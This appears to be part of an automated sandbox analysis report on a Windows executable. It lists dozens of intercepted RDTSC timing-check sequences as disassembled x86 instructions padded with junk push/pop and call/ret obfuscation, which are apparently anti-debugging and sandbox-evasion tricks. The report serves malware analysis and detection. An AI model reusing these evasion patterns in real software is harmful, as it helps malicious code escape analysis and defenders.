                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F075 second address: D4F0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c cld 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6969412EA8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F0A9 second address: D4F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F0AD second address: D4F0B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F0B7 second address: D4F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA6F second address: D4FA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F833 second address: D4F83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4FA73 second address: D4FA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F6969412EA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F83B second address: D4F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53563 second address: D53567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54B1E second address: D54BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c ja 00007F6968D54736h 0x00000012 pop ebx 0x00000013 jmp 00007F6968D5473Bh 0x00000018 popad 0x00000019 nop 0x0000001a add bx, 8901h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F6968D54738h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D2441h], ecx 0x00000041 mov dword ptr [ebp+122D32B2h], esi 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F6968D54738h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Ah 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 jmp 00007F6968D5473Fh 0x00000068 jmp 00007F6968D54749h 0x0000006d push eax 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jns 00007F6968D54736h 0x00000077 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57C58 second address: D57C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59C75 second address: D59C82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59C82 second address: D59C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59C86 second address: D59D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F6968D54738h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 movzx edi, ax 0x00000025 jmp 00007F6968D5473Bh 0x0000002a push 00000000h 0x0000002c mov ebx, 6BA15991h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F6968D54738h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jmp 00007F6968D54749h 0x00000052 xchg eax, esi 0x00000053 jmp 00007F6968D54744h 0x00000058 push eax 0x00000059 pushad 0x0000005a push ebx 0x0000005b pushad 0x0000005c popad 0x0000005d pop ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53CE7 second address: D53CF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F6969412EA8h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56DD0 second address: D56DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56DE0 second address: D56DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BCB0 second address: D5BCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BD65 second address: D5BD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnc 00007F6969412EA8h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F24 second address: D58F2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D5473Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F2E second address: D58F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F6969412EB0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DD05 second address: D5DD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54745h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5ECF9 second address: D5ED89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6969412EB4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007F6969412EBCh 0x00000012 nop 0x00000013 mov di, DC2Dh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F6969412EA8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 mov bx, 857Ah 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F6969412EA8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jo 00007F6969412EA8h 0x0000005e push edi 0x0000005f pop edi 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FC1F second address: D5FC23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C7E second address: D60C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C87 second address: D60C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C8D second address: D60C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F6969412EA6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60C9E second address: D60CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FD39 second address: D5FD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FD3D second address: D5FD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FD51 second address: D5FD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5FD61 second address: D5FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61FEC second address: D62003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D620FB second address: D62101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AD33 second address: D6AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A462 second address: D6A467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A5FB second address: D6A601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A601 second address: D6A605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E8CE second address: D6E8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D757AB second address: D757AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D757AF second address: D757B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74516 second address: D7451A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7451A second address: D7451E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7451E second address: D7452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6968D54736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCA36 second address: CFCA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F6969412EB5h 0x0000000c pop esi 0x0000000d push edx 0x0000000e ja 00007F6969412EA6h 0x00000014 pop edx 0x00000015 popad 0x00000016 jo 00007F6969412EC1h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C57 second address: D74C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C5D second address: D74C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C61 second address: D74C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C69 second address: D74C6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75056 second address: D7505A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7505A second address: D7507D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F6969412EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EAFh 0x00000013 jno 00007F6969412EA6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7507D second address: D7508F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6968D54736h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7508F second address: D75095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75095 second address: D750B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6968D54736h 0x00000008 jmp 00007F6968D54745h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D750B4 second address: D750C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D750C8 second address: D750CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D750CC second address: D750D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D754E8 second address: D754FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6968D5473Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F6968D54736h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D089B9 second address: D089BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D089BF second address: D089F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6968D54754h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F6968D54736h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jp 00007F6968D54736h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E3EC second address: D7E3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E3F2 second address: D7E3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E3F8 second address: D7E3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E6A9 second address: D7E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E6B2 second address: D7E6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E6B6 second address: D7E6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E826 second address: D7E82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E82A second address: D7E836 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6968D54736h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E836 second address: D7E85A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6969412EA8h 0x00000008 pushad 0x00000009 jmp 00007F6969412EB1h 0x0000000e ja 00007F6969412EA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E9C5 second address: D7E9CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EC5B second address: D7EC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F6969412EA6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F241 second address: D7F247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F247 second address: D7F25D instructions: 0x00000000 rdtsc 0x00000002 js 00007F6969412EA6h 0x00000008 jmp 00007F6969412EACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D515B9 second address: D32548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007F6968D5474Fh 0x0000000d jmp 00007F6968D54749h 0x00000012 nop 0x00000013 lea eax, dword ptr [ebp+1249633Ch] 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jno 00007F6968D54736h 0x00000022 jmp 00007F6968D54746h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e popad 0x0000002f mov dword ptr [esp], eax 0x00000032 pushad 0x00000033 movsx edi, ax 0x00000036 movsx eax, ax 0x00000039 popad 0x0000003a call dword ptr [ebp+122D30FEh] 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F6968D54738h 0x00000048 push eax 0x00000049 pop eax 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51C9B second address: D51CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D09 second address: D51D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D14 second address: D51D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6969412EAAh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51D28 second address: D51D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6968D54736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D524AA second address: D524AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52672 second address: D52676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52814 second address: D52818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52818 second address: D52845 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F6968D5473Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F6968D54740h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52845 second address: D5284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8351D second address: D83529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6968D54736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83529 second address: D83538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6969412EA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83538 second address: D83542 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83542 second address: D83550 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F6969412EA6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83550 second address: D83575 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6968D54747h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D837E4 second address: D837FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6969412EB0h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBB8 second address: D0DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D5473Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBC6 second address: D0DBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
